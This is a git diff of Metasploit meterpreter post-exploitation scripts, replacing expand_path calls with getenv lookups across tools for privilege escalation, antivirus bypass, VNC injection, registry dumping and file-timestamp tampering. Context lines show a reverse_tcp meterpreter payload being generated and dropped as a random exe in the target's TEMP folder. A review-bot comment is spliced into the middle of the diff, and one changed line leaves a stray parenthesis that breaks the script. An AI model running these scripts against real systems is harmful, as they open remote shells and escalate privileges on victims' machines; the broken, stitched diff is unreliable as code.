+++ b/scripts/meterpreter/schelevator.rb
@@ -99,6 +99,10 @@ upload_fn = nil
 end
 }
+envs = session.sys.config.getenvs('SystemRoot', 'TEMP')
+sysdir = envs['SystemRoot']
+tmpdir = envs['TEMP']
+
 # Must have at least one of -c or -u
 if not cmd and not upload_fn
 print_status("Using default reverse-connect meterpreter payload; -c or -u not specified")
@@ -110,9 +114,8 @@ if not cmd and not upload_fn
 raw = pay.generate
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 #and placing it on the target in %TEMP%
- tempdir = client.fs.file.expand_path("%TEMP%")
 tempexename = Rex::Text.rand_text_alpha(rand(8)+6)
- cmd = tempdir + "\\" + tempexename + ".exe"
+ cmd = tmpdir + "\\" + tempexename + ".exe"
 print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{cmd}")
 fd = client.fs.file.new(cmd, "wb")
 fd.write(exe)
@@ -139,8 +142,6 @@ end
 #
 # Upload the payload command if needed
 #
-sysdir = session.fs.file.expand_path("%SystemRoot%")
-tmpdir = session.fs.file.expand_path("%TEMP%")
 if upload_fn
 begin
 location = tmpdir.dup
diff --git a/scripts/meterpreter/scraper.rb b/scripts/meterpreter/scraper.rb
index 69faa5dd95..594383e575 100644
--- a/scripts/meterpreter/scraper.rb
+++ b/scripts/meterpreter/scraper.rb
@@ -73,7 +73,7 @@ logs = ::File.join(Msf::Config.log_directory, 'scripts','scraper', host + "_" +
 unsupported if client.platform !~ /win32|win64/i
 begin
- tmp = client.fs.file.expand_path("%TEMP%")
+ tmp = client.sys.config.getenv('TEMP')
 print_status("Gathering basic system information...")
diff --git a/scripts/meterpreter/service_permissions_escalate.rb b/scripts/meterpreter/service_permissions_escalate.rb
index 0f3c4bbdae..adba32dbb8 100644
--- a/scripts/meterpreter/service_permissions_escalate.rb
+++ b/scripts/meterpreter/service_permissions_escalate.rb
@@ -51,6 +51,10 @@ opts.parse(args) do |opt, idx, val|
 end
 end
+envs = client.sys.config.getenvs('TEMP', 'SYSTEMROOT')
+tempdir = envs['TEMP']
+sysdir = envs['SYSTEMROOT']
+
 # Get the exe payload.
 pay = client.framework.payloads.create("windows/meterpreter/reverse_tcp")
 pay.datastore['LHOST'] = rhost
@@ -58,9 +62,8 @@ pay.datastore['LPORT'] = rport
 raw = pay.generate
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 #and placing it on the target in %TEMP%
-tempdir = client.fs.file.expand_path("%TEMP%")
 tempexename = Rex::Text.rand_text_alpha((rand(8)+6))
-tempexe = tempdir + "\\" + tempexename + ".exe"
+tempexe = "#{tempdir}\\#{tempexename}.exe"
 print_status("Preparing connect back payload to host #{rhost} and port #{rport} at #{tempexe}")
 fd = client.fs.file.new(tempexe, "wb")
 fd.write(exe)
@@ -129,7 +132,7 @@ service_list.each do |serv|
 moved = false
 configed = false
 #default path, but there should be an ImagePath registry key
- source = client.fs.file.expand_path("%SYSTEMROOT%\\system32\\#{serv}.exe")
+ source = "#{sysdir}\\system32\\#{serv}.exe")
 #get path to exe; parse out quotes and arguments
 sourceorig = registry_getvaldata("#{serviceskey}\\#{serv}","ImagePath").to_s
 sourcemaybe = client.fs.file.expand_path(sourceorig)
diff --git a/scripts/meterpreter/srt_webdrive_priv.rb b/scripts/meterpreter/srt_webdrive_priv.rb
index 0b6f622ede..deb7748615 100644
--- a/scripts/meterpreter/srt_webdrive_priv.rb
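Review bot: In the last service_permissions_escalate.rb hunk, `source = "#{sysdir}\\system32\\#{serv}.exe")` keeps a closing parenthesis left over from the removed `expand_path(...)` call, which is a SyntaxError: the whole script fails to load, not just this branch. Drop the trailing `)`: `source = "#{sysdir}\\system32\\#{serv}.exe"`. The `service_list.each` block continues outside the hunk.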
+++ b/scripts/meterpreter/srt_webdrive_priv.rb
@@ -87,7 +87,7 @@ client.sys.process.get_processes().each do |m|
 exe = Msf::Util::EXE.to_win32pe(client.framework, raw)
 # Place our newly created exe in %TEMP%
- tempdir = client.fs.file.expand_path("%TEMP%")
+ tempdir = client.sys.config.getenv('TEMP')
 tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 print_status("Sending EXE payload '#{tempexe}'.")
 fd = client.fs.file.new(tempexe, "wb")
diff --git a/scripts/meterpreter/uploadexec.rb b/scripts/meterpreter/uploadexec.rb
index e7044b5360..fe19bfb3f0 100644
--- a/scripts/meterpreter/uploadexec.rb
+++ b/scripts/meterpreter/uploadexec.rb
@@ -23,7 +23,7 @@ def upload(session,file,trgloc = "")
 raise "File to Upload does not exists!"
 else
 if trgloc == ""
- location = session.fs.file.expand_path("%TEMP%")
+ location = session.sys.config.getenv('TEMP')
 else
 location = trgloc
 end
diff --git a/scripts/meterpreter/virusscan_bypass.rb b/scripts/meterpreter/virusscan_bypass.rb
index ccb56af973..c13c803061 100644
--- a/scripts/meterpreter/virusscan_bypass.rb
+++ b/scripts/meterpreter/virusscan_bypass.rb
@@ -32,7 +32,7 @@ def upload(session,file,trgloc)
 if not ::File.exists?(file)
 raise "File to Upload does not exists!"
 else
- @location = session.fs.file.expand_path("%TEMP%")
+ @location = session.sys.config.getenv('TEMP')
 begin
 ext = file.scan(/\S*(.exe)/i)
 if ext.join == ".exe"
diff --git a/scripts/meterpreter/vnc.rb b/scripts/meterpreter/vnc.rb
index bda180d16f..2f398d9e38 100644
--- a/scripts/meterpreter/vnc.rb
+++ b/scripts/meterpreter/vnc.rb
@@ -152,7 +152,7 @@ else
 #
 # Upload to the filesystem
 #
- tempdir = client.fs.file.expand_path("%TEMP%")
+ tempdir = client.sys.config.getenv('TEMP')
 tempexe = tempdir + "\\" + Rex::Text.rand_text_alpha((rand(8)+6)) + ".exe"
 tempexe.gsub!("\\\\", "\\")
diff --git a/scripts/meterpreter/win32-sshclient.rb b/scripts/meterpreter/win32-sshclient.rb
index 94bd070f03..222ba394f4 100644
--- a/scripts/meterpreter/win32-sshclient.rb
+++ b/scripts/meterpreter/win32-sshclient.rb
@@ -87,7 +87,7 @@ def upload(client,file,trgloc = nil)
 raise "File to Upload does not exists!"
 else
 if trgloc == nil
- location = client.fs.file.expand_path("%TEMP%")
+ location = client.sys.config.getenv('TEMP')
 else
 location = trgloc
 end
diff --git a/scripts/meterpreter/winenum.rb b/scripts/meterpreter/winenum.rb
index f494c5076e..34eb1e97aa 100644
--- a/scripts/meterpreter/winenum.rb
+++ b/scripts/meterpreter/winenum.rb
@@ -264,7 +264,7 @@ def wmicexec(wmiccmds= nil)
 @client.response_timeout=120
 begin
- tmp = @client.fs.file.expand_path("%TEMP%")
+ tmp = @client.sys.config.getenv('TEMP')
 wmiccmds.each do |wmi|
 if i < 10
@@ -409,7 +409,7 @@ end
 def chmace(cmds)
 windir = ''
 print_status("Changing Access Time, Modified Time and Created Time of Files Used")
- windir = @client.fs.file.expand_path("%WinDir%")
+ windir = @client.sys.config.getenv('WinDir')
 cmds.each do |c|
 begin
 @client.core.use("priv")
@@ -430,7 +430,7 @@ def regdump(pathoflogs,filename)
 #This variable will only contain garbage, it is to make sure that the channel is not closed while the reg is being dumped and compress
 garbage = ''
 hives = %w{HKCU HKLM HKCC HKCR HKU}
- windir = @client.fs.file.expand_path("%WinDir%")
+ windir = @client.sys.config.getenv('WinDir')
 print_status('Dumping and Downloading the Registry')
 hives.each do |hive|
 begin
diff --git a/scripts/meterpreter/wmic.rb b/scripts/meterpreter/wmic.rb
index 0e038478a0..ccf6121196 100644
--- a/scripts/meterpreter/wmic.rb
+++ b/scripts/meterpreter/wmic.rb
@@ -22,7 +22,7 @@ def wmicexec(session,wmiccmds= nil)
 tmpout = ''
 session.response_timeout=120
 begin
- tmp = session.fs.file.expand_path("%TEMP%")
+ tmp = session.sys.config.getenv('TEMP')
 wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
 wmiccmds.each do |wmi|
 print_status "running command wmic #{wmi}"